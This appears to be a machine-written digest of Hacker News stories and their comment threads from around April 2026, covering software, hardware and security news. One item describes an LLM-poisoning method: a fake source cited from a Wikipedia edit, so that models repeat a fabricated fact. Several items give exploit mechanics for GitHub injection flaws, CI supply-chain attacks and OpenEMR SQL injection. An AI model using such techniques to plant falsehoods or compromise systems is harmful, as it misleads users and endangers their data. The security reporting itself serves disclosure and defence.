Table of Contents

Hacker News

Mitchell Hashimoto, GitHub user #1299 since February 2008, announced Ghostty will leave GitHub due to near-daily outages that block his team from working. He describes GitHub as profoundly personal — he credits it with shaping his career, started Vagrant partly hoping it would get him hired there, and has spent much of his daily life on the platform. Over the past month he tracked outages in a journal, finding nearly every day marked with an "X" for service disruption, including a two-hour GitHub Actions failure on the day he wrote the post. He clarifies the decision predates the large April 27, 2026 Elasticsearch outage and was months in the making. Ghostty plans an incremental migration while keeping a read-only GitHub mirror; the final destination — commercial or FOSS — is still being finalized. His personal projects will remain on GitHub for now, and he expressed hope GitHub will eventually improve.

Comments: Commenters broadly validate Hashimoto's frustrations, citing GitHub's post-Microsoft-acquisition decline — attributed to resource diversion toward Copilot, organizational culture shifts, and possibly AI-generated code degrading the codebase. An unofficial GitHub status tracker is cited as evidence of systematic degradation. Users note they are already migrating or evaluating alternatives including Codeberg, Forgejo, self-hosted GitLab, Sourcehut, and the ATProto-based Tangled. A GitHub staff research engineer acknowledged internally that PRs and issues aren't ideal future primitives. Concerns are raised about ecosystem fragmentation, loss of discoverability, and the difficulty of managing accounts across multiple forges. Some argue GitHub's proprietary centralization was always a free-software liability; others see Microsoft's broader engineering culture as the root cause. A few defend GitHub as still functional for their use cases, while several users note the irony of Hashimoto needing to clarify which of multiple recent outages he was referencing.

Open source hosting evolved from personal Trac/Subversion setups and SourceForge to GitHub's centralized dominance, now facing fragmentation. Pre-GitHub, dependencies carried real commitment — projects had known maintainers, release processes, and reputation weight; micro-dependency culture didn't exist. GitHub eliminated publishing and consumption friction and accidentally became a long-term archive where abandoned projects and discussions stayed discoverable. Today it faces criticism for product instability, Copilot AI noise, absent leadership, and maintainer-hostile workflows; Ghostty, Strudel, and Tenacity are migrating to Codeberg. Decentralization risks losing fragile social context — issues, reviews, and design discussions disappear far more easily than code. Google Code and Bitbucket show how corporate-tied project homes fail. The author calls for a publicly funded, endowment-backed archive so open source memory doesn't depend on GitHub's continued health.

Comments: Commenters respond with both nostalgia and critique. Several users fondly recall Trac, noting Django has run on it for over 20 years, and highlighting how its setup friction was a genuine barrier to entry. Google Code's abandonment is cited as another example of centralized platforms failing the open source community. The sharpest pushback challenges the article's historical accuracy: one commenter argues pre-GitHub open source wasn't significantly smaller immediately before and after GitHub's emergence, that most FOSS isn't obtained from GitHub today, and that the author only knew the project names they personally encountered — not a universal truth. That same commenter disputes the implication that reputation no longer matters in today's ecosystem, and notes the historical framing ignores Red Hat's prominence, the fact that Windows users were then (as now) the majority, and the existence of BSD distributions — concluding the article offers an inaccurate description of history.

A security researcher fabricated a "6 Nimmt! World Championship" via a $12 domain and one Wikipedia edit, tricking multiple frontier LLMs into confidently repeating the false claim. The circular citation exploit places a fake press release on a custom domain, cites it from Wikipedia, and LLMs interpret two apparently corroborating sources that are actually one. Three stacked failure modes amplify the risk: retrieval (LLMs inherit search-result trustworthiness), training corpus (Wikipedia edits absorbed permanently into future model weights), and the agent layer (agents acting on poisoned sources can trigger harmful real-world actions). The attack took only twenty minutes—far cheaper than training-time poisoning. Scaled by state actors, coordinated campaigns across low-traffic articles could corrupt narratives on politics, health, or survival. Proposed mitigations include provenance-first UX, heuristic filters for Wikipedia edits citing freshly registered domains, and updated Wikipedia policy on single-source citations. The Wikipedia edit was removed within minutes of publication, but models trained before the revert permanently retain the fabricated fact.

Comments: Commenters note this attack isn't novel—one user named a whale "Teresa T" via a blog post and YouTube caption, fooling search-enabled LLMs for weeks. Many draw parallels to SEO manipulation, noting LLMs inherit the same vulnerabilities that already plagued Google rankings. Some question whether it qualifies as true "LLM poisoning," since the models were reporting live web results rather than hallucinating from corrupted weights. A BBC journalist reportedly ran a similar experiment in February 2026. Core concern centers on state actors who could execute this at scale, rewriting geopolitical, electoral, or health narratives—Wikipedia-based political poisoning is noted as already happening. The broader worry is that most people lack AI media literacy, and current citation UX—tiny opaque buttons rather than explicit provenance scoring—makes verification nearly impossible. Historical fabricators like Frank Dux and Frank Abagnale are invoked as precedent, with one commenter noting much of recorded history may rest on similarly thin evidence. A dissenting voice questions whether deliberately poisoning LLMs serves any constructive purpose.

Warp, an agentic development environment born from the terminal, has open-sourced its client codebase under a dual license: the UI framework crates (warpui_core and warpui) under MIT, and the remainder under AGPL v3. OpenAI is the founding sponsor of the new repository, with agentic management workflows powered by GPT models. Users can bring their own CLI agents, including Claude Code, Codex, and Gemini CLI. The contribution workflow uses readiness labels — ready-to-spec and ready-to-implement — to guide community contributors from issue triage through code submission. Building from source requires three scripts: bootstrap for platform setup, run for building, and presubmit for formatting, linting, and tests. Warp highlights several open-source dependencies that helped it launch, and maintains a Code of Conduct enforced via email reporting.

Comments: Users are sharply divided, with prominent criticism directed at Warp's origins as an Alacritty fork that secured $50M in venture funding without contributing back to the upstream open-source project, and some see the OpenAI founding sponsorship as similarly exploitative. Many former users have migrated to Ghostty or iTerm2, citing an overwhelming, frequently-shifting UI and AI features being aggressively surfaced — one paying user notes their ESC key is wearing out from dismissing unwanted AI prompts. On the positive side, users praise specific features like vertical tabs, the agents layout with automatic worktree management, and the code review panel as genuinely workflow-improving. Several commenters question whether Warp is still a terminal at all, observing it now resembles Cursor or Codex more than a shell host. Questions were raised about the motivations behind open-sourcing — including whether Devin CLI influenced the decision — and how the repository accumulated 29k stars within roughly two hours of launch.

Intel's Arc Pro B70 doubles the B50's Xe2 cores and VRAM to 32 GB at $950, targeting AI inference with 230W TDP and 608 GB/s bandwidth. It undercuts AMD's R9700 by ~30% while matching its 32 GB VRAM, and beats NVIDIA's RTX 2000 Blackwell on VRAM at $200 more. In most professional workloads—Premiere, DaVinci Resolve, Blender, Unreal Engine—it outperforms the 2000 Blackwell but trails the R9700, fitting its price tier. NVIDIA leads in After Effects and Lightroom Classic; the B70 leads in Revit and dominates MLPerf inference, beating R9700 and 4000 Blackwell by 7% and the 2000 Blackwell by 98% in token generation. Intel's Xe2 architecture (SIMD16, next-gen XMX engines) and driver work contribute measurable gains over Alchemist. The card includes ECC memory, dual 8K media engines, and certified drivers for Adobe, Autodesk, and Dassault Systèmes ISVs. Reviewers note the B70 is "unbalanced" for general use—VRAM exceeds raw compute for many workloads—but 32 GB makes it compelling for multi-GPU inference workstations targeting 70B+ models at 96–128 GB pooled VRAM.

Comments: Users highlight time-to-first-token as a critical inference metric, though the 230W TDP draws concern for multi-GPU deployments due to heat density. Intel's drivers are widely cited as a significant limitation for LLM use cases, with the software stack seen as holding back real-world performance. Supply availability is questioned, with speculation that initial stock will sell out quickly given timing relative to recent DRAM price increases. Intel's long-term GPU market commitment is raised as an open question, reflecting ongoing uncertainty about its pro GPU roadmap. A Linux-focused commenter points to llama.cpp benchmarks as an alternative performance reference. Hobbyists find the 32 GB VRAM appealing but consider the power draw a scaling obstacle for densely deployed inference rigs. One user asks whether professional AI cards can double as gaming cards or are intentionally restricted for market segmentation.

Developer built a playable DOOM MCP app rendering inline in ChatGPT and Claude, with a plain URL fallback for unsupporting clients. It uses cloudflare/doom-wasm for the runtime and Freedoom Phase 1 to stay redistributable. The architecture is lean: a TypeScript MCP server with two tools—create_doom_session for inline hosts and get_doom_launch_url for fallback—a /doom/play browser shell, a signed-token session, and Netlify hosting. The main challenge was session compatibility across clients with different iframe, CSP, and UI rules; the solution was running the DOOM canvas directly in the host iframe rather than nesting iframes, eliminating a class of frame-src and CSP failures. Debugging involved WAD path resolution, blob-backed preload issues, and Netlify packaging; the blob preload was replaced by writing WAD/config directly into the Emscripten filesystem. Features like save/load and screenshots were cut in favor of a leaner, more stable design. The project partially works on ChatGPT and Claude iOS apps as well.

Comments: Commenters broadly find the project impressive while offering a key technical clarification: DOOM is not running "on" AI—it runs via cloudflare/doom-wasm inside an iframe surfaced through an MCP app, which is simply HTML in an iframe registered as an MCP resource. Several note MCP's underexplored potential for in-chat interactive apps beyond simple tool calls, citing working examples like a no-auth MCP clock and a Constitution-browsing UI as further proof of the pattern. Priority disputes arise, with one commenter pointing to a DOOM-in-MCP video from a month prior and another noting they put Bad Apple in an MCP app two weeks ago, prompting frustration about ideas being quickly copied and karma-farmed. Some express mild disappointment that the AI itself isn't autonomously playing DOOM over MCP, while others are simply confused about what is technically happening. The technical consensus is that the project's real value is demonstrating MCP apps as genuine interactive surfaces with layout, input, and security constraints analogous to the open web, and that games are an effective way to stress-test new protocol limits.

CJIT is a tiny, portable C compiler and interpreter—under 2MB in a single binary—built by Jaromil and the Dyne.org crew, inspired by Terry Davis's HolyC and based on Fabrice Bellard's TinyCC. It targets Windows, macOS, and Linux without requiring a license agreement or IDE, and supports hooking into any dynamic library for rapid C development. The project supports graphical apps via SDL (originally by Sam Lantinga, 1998), with batteries-included demos. Linux compatibility is limited to Ubuntu 24.04 specifically; the binary fails on Arch due to a missing libgcc_s.so.1 path seemingly loaded via dlopen. TUI demos work but SDL examples have unresolved symbol issues. The website has UX rough edges including a broken tutorial nav link and a visually compressed font. The hello-world example uses fprintf(stderr,...) rather than stdout, which diverges from convention.

Comments: Commenters suggest pairing CJIT with Fil-C to achieve a fully memory-safe C scripting experience. The Terry Davis/HolyC inspiration draws surprised recognition, with users linking to the TempleOS and Terry Davis Wikipedia pages. A significant compatibility concern is raised: the Linux binary is Ubuntu 24.04-specific and fails on Arch Linux with a missing libgcc_s.so.1 error, with TUI demos working but SDL examples failing symbol resolution after some troubleshooting. The Mir project is mentioned as a more comprehensive alternative offering custom JIT tooling with its own C compiler. Website issues flagged include a broken tutorial header link and a font that feels visually compressed. The non-standard hello-world using fprintf(stderr,...) drew mild criticism. Some speculate the site design may be AI-generated. Overall interest in trying the project is positive, with one user noting the SDL graphical support as a strong included feature.

Wiz Research discovered CVE-2026-3854, a critical RCE flaw in GitHub's git infrastructure affecting GitHub.com and GitHub Enterprise Server. The flaw is in babeld, the git proxy, which embeds push option values (git push -o) verbatim into the X-Stat header — a semicolon-delimited key=value protocol — without sanitization. The header's last-write-wins semantics mean an injected semicolon creates attacker-controlled fields. Chaining three injections (rails_env, custom_hooks_dir, repo_pre_receive_hooks) bypasses the pre-receive sandbox, redirects hook lookup, and executes arbitrary binaries as the git user. On GitHub.com, injecting an enterprise-mode flag completed the chain on shared storage nodes hosting millions of cross-tenant repositories. Wiz confirmed the git user's permissions would expose any repository on a compromised node, validating with only their own test accounts. GitHub fixed GitHub.com within 6 hours of the March 4 report and released GHES patches March 10, but 88% of instances remain unpatched at disclosure. The find was enabled by AI-augmented reverse engineering via IDA MCP, one of the first critical CVEs uncovered in closed-source binaries using AI.

Comments: Commenters highlight the AI-augmented reverse engineering methodology as a watershed moment, noting LLMs accelerate the hardest step in security research — understanding closed-source system internals — after which the vulnerability itself is often trivial to identify. Many call the underlying flaw textbook injection: user input glued into a delimiter-based protocol without sanitization, with the observation it would have been found quickly on a more accessible attack surface. The statistic that 88% of GHES instances remain unpatched seven weeks after a critical fix is widely flagged as alarming. Questions arise about whether GitHub can determine if exploitation occurred before disclosure. GitHub's dominant market position amplifies concern, with users noting any replacement platform faces the same underlying risks. Wiz Research's track record and tooling quality are praised despite rapid company growth. The broader systemic lesson emphasized is that multi-service architectures passing shared data formats between components create dangerous assumption chains, and treating user-supplied data as trusted instructions is a recurring root cause across codebases.

Google announced in August 2025 that starting September 2026, all Android developers globally must register with Google, pay a fee, submit government ID, and list signing keys — covering every distribution channel, not just the Play Store. This threatens F-Droid, hobbyist projects, corporate internal apps, and open-source tools. Over 69 organizations from 21 countries signed an open letter opposing it, with F-Droid calling it an "existential" threat. Google offers an "advanced flow" opt-out, but critics note the 9-step process includes a mandatory 24-hour wait and runs through proprietary Play Services, allowing Google to silently revoke it. The EFF and Cory Doctorow argue certifying developers rather than code does nothing for security but creates an identity database governments can exploit to target privacy-tool developers and activists. Developers from sanctioned countries, minors, and pseudonymous contributors face systematic exclusion. EU regulators are examining potential Digital Markets Act violations, while critics frame the move as Google consolidating monopoly control following its loss in the Epic Games antitrust case.

Comments: Commenters offer a more measured view, noting the article overstates the situation: an opt-out does exist, and ADB can bypass the 24-hour cooling period. Many observe Android was never truly open since locked bootloaders long foreclosed full device control. GrapheneOS is widely cited as a practical alternative, though banking and government apps frequently refuse to run on modified devices. Users in countries with internet restrictions note sideloading is practically necessary for censored or banned apps. Concern is raised about a negative network effect: if the opt-out deters most users, fewer developers will distribute outside Play, further shrinking the open ecosystem. Niche communities — including DIY diabetic medical-software users — warn life-critical apps will be caught in the dragnet. Some call the campaign "fearmongering," others say the urgency is warranted. The EU Digital Markets Act's applicability is flagged, and speculation runs that Windows could follow a similar path. One commenter dryly notes the campaign site was clearly built with AI.

GitHub exposes mail-style patch exports at .patch URLs, and a security researcher discovered that GNU patch cannot reliably distinguish between the actual diff exported from a commit and diff-shaped text embedded in the commit message. Using a public demo repo, the real commit changes only readme.md, but a fake unified diff embedded in the commit message creates SHOULD_NOT_BE_HERE.md — and running wget plus patch -p1 on the exported .patch file applies both silently. The researcher also tested targeting .git/hooks/post-applypatch locally, which patch accepted without complaint. git apply and git am behaved slightly better by rejecting .git/... paths, but both still accepted injected diffs for ordinary working-tree files. The vulnerability is noteworthy because wget/curl plus patch is a common, decades-old workflow for moving patches between machines. Responsibility for the flaw is unclear — it could belong to GNU patch, GitHub's .patch export format, or the broader patch-format contract itself.

Comments: Commenters note this issue has surfaced multiple times before and attribute the root cause to Unix tooling's tradition of boutique, undocumented file formats — arguing that if patches were structured as XML or JSON, the ambiguity wouldn't exist. One suggests GitHub should indent commit message bodies in exported .patch files (as git show effectively does), since git format-patch currently does not, leaving no clear in-band signal for where the message ends and the diff begins. A technical deep-dive explains that git am uses three heuristics to delimit commit messages from diffs — a bare --- line, a line starting with diff -, or one starting with Index: — meaning any unindented diff in a commit message will be applied. Crucially, GNU patch 2.7.6 goes further: it actively handles consistently indented diffs, CRLF line endings, and RFC 934 encapsulation, making it more permissive than git am. Commenters point out that Larry Wall wrote patch with intentional DWIM ("Do What I Mean") behavior, so the liberal parsing is by design rather than a bug.

Waymo has announced expansion to Portland, Oregon, beginning with manually-driven mapping operations before autonomous deployment. The company cites a 13x reduction in serious injury crashes in existing markets and has secured support from Mayor Keith Wilson and MADD, framing the service as a tool for Portland's Vision Zero traffic fatality goals. The announcement lands as TriMet faces a $300M budget shortfall—cutting staff, routes, and light rail service—while a state payroll tax repeal ballot measure threatens further funding losses. Portland's city council is simultaneously debating driver pay caps for Uber and Lyft. The city's mix of streetcars and light rail raises operational concerns, given a 2026 Phoenix incident where a Waymo became stuck on tracks. Privacy worries surround in-car cameras despite Waymo's stated "no plans" for ad targeting. Critics also challenge the blog post's characterization of Portland as "always a pioneer in urban design," citing the city's documented history of explicitly racist planning and segregation.

Comments: Commenters contextualize Waymo's arrival against TriMet's $300M funding crisis—cuts worsened by a pending payroll tax repeal—and Portland's city council debate over rideshare driver pay caps, with some seeing Waymo as filling both gaps at human workers' expense. Portland's light rail and streetcar infrastructure raises safety concerns given a Phoenix incident where a Waymo got stuck on tracks. Privacy skepticism runs high, with sarcasm directed at Waymo's "no plans" to use interior camera footage for ads. Others question Google's estimated $30–40B decade-long subsidy. Anticipated community resistance—protests, vandalism, traffic cone placement—is widely discussed, with Portland's strong tech skepticism and anti-AI sentiment as compounding factors. One commenter challenges the post's claim that Portland has "always been a pioneer in urban design," linking to evidence of the city's explicitly racist early planning history. Questions about service footprint, intercity expansion, and whether TriMet's $2.50 MAX fare makes Waymo uncompetitive also feature prominently.

Anthropic's Claude services suffered a 78-minute outage on April 28, 2026, from 17:34 to 18:52 UTC, affecting claude.ai, Claude Console, the Anthropic API, Claude Code, Claude Cowork, and Claude for Government. The incident began as an inability to access Claude.ai, escalated to include elevated API errors and authentication failures on login paths for Claude Code, and was fully resolved by 18:52 UTC. Anthropic identified the root cause during the incident and posted status updates at roughly 10–20 minute intervals. All services were confirmed returned to normal with continued monitoring after resolution.

Comments: Enterprise users spending $200K+/month express frustration at repeated outages and poor support, with observers noting Claude has dropped to roughly one nine of uptime over 90 days. Many have adopted multi-model strategies pairing Anthropic with Codex and Gemini, or shifted to self-hosted H100 clusters running open models, citing low LLM switching costs versus traditional multi-cloud overhead. The CLI-based Yaw terminal mode remained functional during the outage while the browser was fully unavailable. Debate erupted about Anthropic's reliability at its ~$1 trillion valuation, drawing comparisons to early World of Warcraft server instability — frustrated but captive users. Users question whether recurring authentication failures reflect fundamental inference-serving challenges or gaps in SRE investment, and some used the downtime to test Codex, Gemini, and local Qwen as alternatives. Concerns also arose about model routing transparency, with suspicion that cheaper models may sometimes substitute for premium tiers like Opus without user awareness.

The author officially retired from Emacs after 20 years, completing a gradual transition to Vim and modal editing. To fully cut ties, he built two native C++ GUI applications with wxWidgets: stackcalc (a replacement for M-x calc using GMP and MPFR for multi-precision arithmetic) and Elfeed2 (a rewrite of his popular RSS reader Elfeed, maintained for 13 years). The Emacs Calculator lacked any suitable external replacement, so his clone covers personal usage but omits esoteric features like symbolic processing. Elfeed2, completed in just a couple of days with AI assistance, already surpasses the original despite not yet hitting 1.0. He chose wxWidgets over Qt (lighter weight, CMake FetchContent compatible) and Dear ImGui (unsuitable for passive-rendering apps left running all day), noting wxWidgets works better than expected despite character encoding issues and accidental quadratic-time operations. Both projects build with just a C++ toolchain and CMake on Windows, macOS, and Linux. He is seeking new maintainers for his remaining active Emacs packages; if none step forward, projects will be archived but not deleted.

Comments: Comments note this as a significant loss for the Emacs community, particularly for Elfeed users, with hope a new maintainer emerges. The author has broadly "spring cleaned" — moving from Xorg/Openbox to KDE on Wayland and reducing terminal-centric tooling. Several users ask why wxWidgets over Qt, noting its older clunkiness, while the author cited lighter weight and CMake FetchContent compatibility. The "newly-acquired superpowers" are identified as AI/LLM assistance — per a linked post, the author no longer personally writes code professionally, calling this the future of software engineering. This draws sharp pushback, with some calling it "AI psychosis" and predicting a post-bubble reckoning. Others observe LLMs enable fragmentation away from unified platforms like Emacs Lisp, where a shared semantic model allowed cross-layer reuse. The Emacs vs. Vim debate resurfaces, with some finding Emacs more efficient for real-time coding despite Vim's speed. A request surfaces for a standalone magit replacement usable outside any editor.

LocalSend is a free, open-source cross-platform file transfer app that operates without internet by communicating over a local network using a REST API with HTTPS encryption and on-the-fly TLS/SSL certificates per device. It supports Windows, macOS, Linux, Android, iOS, and Fire OS, distributed via Winget, Homebrew, Flathub, Play Store, F-Droid, and others. It communicates over port 53317 (TCP/UDP) and requires AP isolation to be disabled on the router for device discovery; Windows users must set their network to "Private." Built with Flutter and Rust, it offers a portable mode via a settings.json file placed alongside the executable, and a --hidden flag for tray-only startup. Minimum platform versions include Android 5.0, iOS 12.0, macOS 11 Big Sur, and Windows 10 (v1.15.4 is the last release supporting Windows 7). The LocalSend protocol is publicly documented, and contributions are welcomed via Weblate for translations or GitHub pull requests for bug fixes.

Comments: Users broadly find LocalSend reliable and fast for cross-platform transfers between Windows, macOS, Android, and iOS, often calling it superior to KDE Connect in consistency. The central limitation cited is its requirement for a shared local network — unlike AirDrop, which creates its own ad-hoc connection — forcing users to tether or set up a mobile hotspot as a workaround. Reported bugs include interrupted transfers leaving corrupt files on the receiver, macOS sleep being blocked while the app runs, and unreliable behavior when Tailscale is active. Several alternatives are discussed: PairDrop (browser-based, supports non-LAN via public rooms), Sendme/Iroh (P2P relay with no central server), aero.zip (E2E encrypted, WAN, up to 10 Gbps, 2 GB free), Blip (P2P, cross-platform, no size limit), Magic Wormhole, and WebRTC-based tools like sendfiles.dev. Speed comparisons with AirDrop are unfavorable, as AirDrop uses different underlying peer selection technology. Users suggest compressing directories into archives before sending for significantly faster transfers, and note that both devices require manual preparation before each session rather than being always-ready.

Warp, the AI-powered developer terminal, is open-sourcing its client under an AGPL license at github.com/warpdotdev/warp, with OpenAI as founding sponsor. The company's novel approach uses its "Oz" cloud agent orchestration platform—powered by GPT models—to let community members supervise agents rather than write code directly, with humans focusing on product direction and verification. Warp cites competitive pressure from better-funded closed-source rivals and limited internal bandwidth as primary drivers. Alongside the launch, Warp is shipping support for more open models (Kimi, MiniMax, Qwen) with an "auto (open)" routing mode, a programmatic settings file, and UI customization ranging from a minimal terminal to a full agentic development environment (ADE). Public GitHub issues will become the official roadmap, moving product discussions into the open. Warp's founders note the plan to open-source has been in place since the company's founding five years ago, and believe a diverse contributor community plus structured agent orchestration will produce results beyond what an internal team could achieve alone.

Comments: Users broadly welcome the open-source announcement and praise Warp's terminal UX, though reactions to the AI-heavy direction are mixed. Several want a lightweight fork stripped of agentic features, with disappointment expressed that no commit history was included—which would have allowed branching from the pre-AI codebase. Some note that AI features are opt-in and only activate after login, while others find that updates repeatedly re-enable features they've disabled. There's curiosity about the long-term business model—whether it targets acquisition or shifts to LLM-token revenue like competitors such as OpenCode. Users compare Warp's full ADE approach to minimalist alternatives like Ghostty, and one shares a superset.sh workflow enabling parallel agent workspaces with automatic ticket pulling, port reservation, and environment setup across multiple worktrees. A few comments note confusion with OS/2 Warp due to the unqualified title, and the thread is flagged as a duplicate of an earlier HN post with more comments.

VibeVoice is Microsoft's open-source family of frontier voice AI models covering TTS and ASR. The core innovation is continuous speech tokenizers at 7.5 Hz paired with a next-token diffusion framework: a Qwen2.5 LLM backbone handles context while a diffusion head generates audio. The ASR model (7B) processes 60 minutes in a single 64K-token pass, jointly performing transcription, speaker diarization, and timestamping across 50+ languages with custom hotwords — preserving speaker continuity lost by chunk-based models. The TTS model (1.5B), an ICLR 2026 Oral, synthesized 90-minute multi-speaker audio with up to 4 speakers but was removed after misuse for deepfakes. A 0.5B Realtime model remains, offering streaming TTS at ~300ms first-latency with voices in 9 languages. The ASR is now in Hugging Face Transformers with vLLM support. Microsoft warns against commercial use, citing deepfake risks and biases inherited from the Qwen2.5 base model.

Comments: Several users challenge the "open source" label, arguing only weights are released while training code is proprietary — making it "open weight" at best. ASR criticisms include hallucinations, high inference cost, and weak multilingual accuracy. Voxtral by Mistral is repeatedly cited as a superior alternative small enough to run on WebGPU. Conversely, hands-on users praise the built-in diarization as a major advantage over Whisper plus separate Pyannote pipelines, citing better out-of-the-box reliability for podcast and meeting transcription. The TTS removal draws wry commentary — described as a "rug pull for safety" — with questions about what has changed since. A cybersecurity researcher's investigation into the repository and a separate "vibing.exe" app accused of harvesting screen, audio, and clipboard data are both linked. Comparisons to Parakeet and Whisper remain unresolved. The name "VibeVoice" is widely mocked as emblematic of Microsoft's poor product naming, with users noting the irony it wasn't called "Copilot Voice."

Neuroscientists described BTSP (behavioral timescale synaptic plasticity), a newly identified neuroplasticity form enabling single-experience learning. Discovered in 2014 by Jeffrey Magee's team recording hippocampal dendrites in live rodents, a single dendritic plateau potential caused place cells to fire at a location 99.5% of the time after one exposure — previously thought to require repeated Hebbian firing. Unlike Hebbian plasticity (milliseconds), BTSP spans six to eight seconds, better matching real behavioral timescales. The mechanism involves eligibility traces tagging recently active synapses, which are strengthened when a plateau potential spreads voltage across the dendrite; CaMKII protein plays a key molecular role by increasing receptor surface area. BTSP may also solve the credit assignment problem by reinforcing only contextually relevant neurons. Confirmed mainly in the hippocampus, some researchers debate whether it truly differs from a broadly defined Hebbian framework. Most agree BTSP complements rather than replaces Hebbian learning, with Hebbian plasticity dominating early brain development and BTSP more prominent in adult episodic memory formation.

Comments: Nothing to summarize!

Lumara is a free, privacy-first iOS and Android app built by a solo U.S. Army veteran developer that displays live solar imagery from NASA's Solar Dynamics Observatory — updated every ~15 minutes across 12 wavelengths ranging from the 5,000 K surface to 10 MK flare plasma. It tracks moon phases offline using Jean Meeus's Astronomical Algorithms (accurate to minutes), and monitors solar flares (B–X scale), coronal mass ejections (up to 3,000 km/s), and geomagnetic storms (G1–G5) via NASA's DONKI database in real time. Users select a city from a local list — no GPS, no account, no data transmission — and all solar and lunar images are fetched directly from NASA/ESA servers. The app is completely free with no premium tier, no ads, and no in-app purchases, and is now live on both the App Store (universal iPhone/iPad) and Google Play.

Comments: Users broadly praise the app's clean UI and design, though one raises a performance concern: the site hotlinks multiple 30MB 2K-resolution videos directly from NASA's SVS servers, suggesting optimization is needed. A developer asks about the moon phase API for their own project, while another recalls a similar SOHO classroom display project that never shipped. UI feedback includes requests for additional ways to exit full-page views (beyond ESC), removing the glowing box outline around wavelength buttons, and minor alignment fixes. Several users wish the app supported desktop wallpapers or screensavers. One detailed comment flags inconsistent metric usage throughout — mixing kelvins with Celsius, km/s with km/h, and using "M" ambiguously for both "million" and "mega" — and calls for adherence to SI standards for clarity. Feature requests include CME tracking, tooltips explaining each wavelength, and a Home Assistant HACS integration. One user notes the data is technically "live minus ~500 light-seconds," and the iOS App Store link was initially broken before being fixed at launch.

In January 2026, federal agents shot and killed Renee Good, a 37-year-old mother of three, during Minneapolis protests against immigration raids; DHS immediately labeled her an "anti-ICE rioter" who committed "an act of domestic terrorism" before fully gathering facts. Days later, on January 16, DHS expanded no-fly zones to prohibit drones within 3,000 lateral feet and 1,000 vertical feet of federal facilities. Critically, for the first time these zones extended to DHS ground vehicles — even unmarked ones, even while in motion, and even on routes that had not been publicly announced. Government agencies were granted authority to shoot down or seize drones deemed a "credible safety or security threat," with civil and criminal penalties for operators. This created effectively invisible, moving no-fly zones impossible for the public to anticipate or avoid. The policy immediately chilled journalists like Rob Levine, a Minneapolis-based freelance photojournalist with nearly 40 years of experience, who has used DJI quadcopter drones since 2016 to document protests, rivers, and city life, and who stopped flying immediately upon seeing the notice.

Comments: Commenters highlight the fundamental absurdity of the DHS policy: because the no-fly zones apply to unmarked vehicles moving along unannounced routes, it is practically impossible for the public to know when or where they are in violation. The dark irony observers note is that affected individuals may only learn the relevant prohibited time and location after being charged — and that such information could itself be classified. Others express incredulous disbelief at both whoever authored the policy and the chain of command that approved it, suggesting the rule creates sweeping enforcement power with no reasonable mechanism for the public to achieve compliance in advance.

AISLE, an AI security firm, discovered 38 CVEs in OpenEMR — an open-source EHR platform used by over 100,000 providers and 200 million patients — during Q1 2026, surpassing the 23 vulnerabilities found in its most notable prior 2018 audit. The flaws fall into three categories: authorization failures including IDORs and missing ACL checks (24 CVEs), stored and reflected XSS (9 CVEs), and SQL injection plus path traversal (5 CVEs). Two SQL injection vulnerabilities scored CVSS 10.0: one in the Patient REST API's _sort parameter enabling UNION SELECT attacks, blind SLEEP() injection, and potential RCE via FILE privileges; another in the Immunization module's patient_id field with identical impact. A FHIR CareTeam endpoint exposed all patient records regardless of token scope due to a missing PHP interface declaration. OpenEMR maintainers fixed the bulk of issues in version 8.0.0 on February 11, 2026, with remaining patches landing through March. AISLE has since integrated its commit analyzer into OpenEMR's CI pipeline to catch vulnerabilities at code review before they reach production.

Comments: Commenters broadly agree the findings are unsurprising, noting OpenEMR has been known for poor security for over 16 years with similar vulnerabilities published as far back as 2010. Several challenge the marketing framing, arguing SAST/DAST tools would yield comparable results. The "100,000 providers" claim is questioned — the sourced link traces to a now-404'd blog post from a defunct company — and users caution against equating OpenEMR's posture with enterprise EHRs like Epic. A former maintainer notes the codebase includes PHP 3-era code and should not be publicly exposed. The deeper concern is an AI-driven cybersecurity arms race: adversaries now have equal access to autonomous scanning, potentially enabling silent zero-day discovery at scale. Despite skepticism about the AI narrative, most agree AI-assisted auditing is genuinely valuable for catching common patterns like SQL injection and XSS before production. One commenter noted responsible disclosure details were buried at the article's end and should have been stated upfront.

Cua is an open-source Python framework (3.11+) for building AI agents that autonomously control computers — macOS, Linux, Windows, and Android — both locally via QEMU and in the cloud. Its headline feature is a background automation driver for native macOS apps that avoids stealing cursor focus or switching Spaces, even on non-Accessibility surfaces like Chromium web content and canvas-based tools such as Blender and Figma. The unified API exposes shell execution, screenshots, mouse clicks, keyboard input, and multi-touch gestures across all supported platforms. A companion CLI, cuabot, runs agents in sandboxed desktop windows with H.265 video, shared clipboard, and audio. The lume component manages macOS and Linux VMs on Apple Silicon using Apple's Virtualization.Framework for near-native performance. A benchmarking suite, cua-bench, supports evaluating agents on standard datasets like OSWorld and ScreenSpot with trajectory export for RL training. Every session records a replayable trajectory. Integration with Claude Code and Cursor is available via MCP server. The project is MIT licensed, though the optional ultralytics dependency via cua-agent[omni] carries AGPL-3.0 terms.

Comments: Commenters are broadly impressed, with one calling it among the coolest macOS hacks they've seen recently, noting that Apple's reluctance to expose agent-friendly APIs may push momentum toward agent-friendly Linux or Android alternatives. An ex-Apple engineer praised the technical implementation, drawing comparisons to a similar in-house tool they built for parallel native macOS UI automation testing, but criticized the default-on telemetry, arguing users should opt in rather than opt out. One user reported a positive prior experience with the lume VM component but ultimately chose to give agents direct supervised access to their own devices instead. A compliance-minded observer raised an audit trail gap: while agent actions produce logs of what was clicked or edited, the decision rationale behind each action isn't captured, making it difficult to explain agent behavior to compliance teams reviewing ERP interactions or file edits. A brief exchange also noted that the technical implementation had been publicly speculated about on HN roughly two weeks prior, with the speed of replication drawing favorable comment.

Supply chain attacks from Nov 2024 through April 2026 trace to GitHub Actions misconfigurations, not maintainer error. The pull_request_target trigger grants full secret access to fork-checkout jobs, enabling the spotbugs breach that cascaded through reviewdog to tj-actions, leaking secrets from 23,000 repos. Ultralytics was hit via cache poisoning through the same trigger, shipping a crypto miner to PyPI. The nx build system fell to template injection when a PR title ran shell code with an npm token in scope, briefly exposing thousands of private repos. Trivy was compromised twice: via pull_request_target, then via force-pushed version tags using harvested credentials. Elementary-data fell in ten minutes via an issue_comment trigger echoing unsanitized input to bash. Common factors: mutable action tags, default write GITHUB_TOKEN, unsafe ${{}} shell expansion, and cross-trust-boundary caches. GitHub's security roadmap adds SHA lockfiles, scoped secrets, and egress firewalls — all opt-in, leaving the long tail of public repos exposed. OIDC trusted publishing now chains registry integrity to GitHub Actions security. Zizmor and SHA pinning are the most actionable immediate defenses.

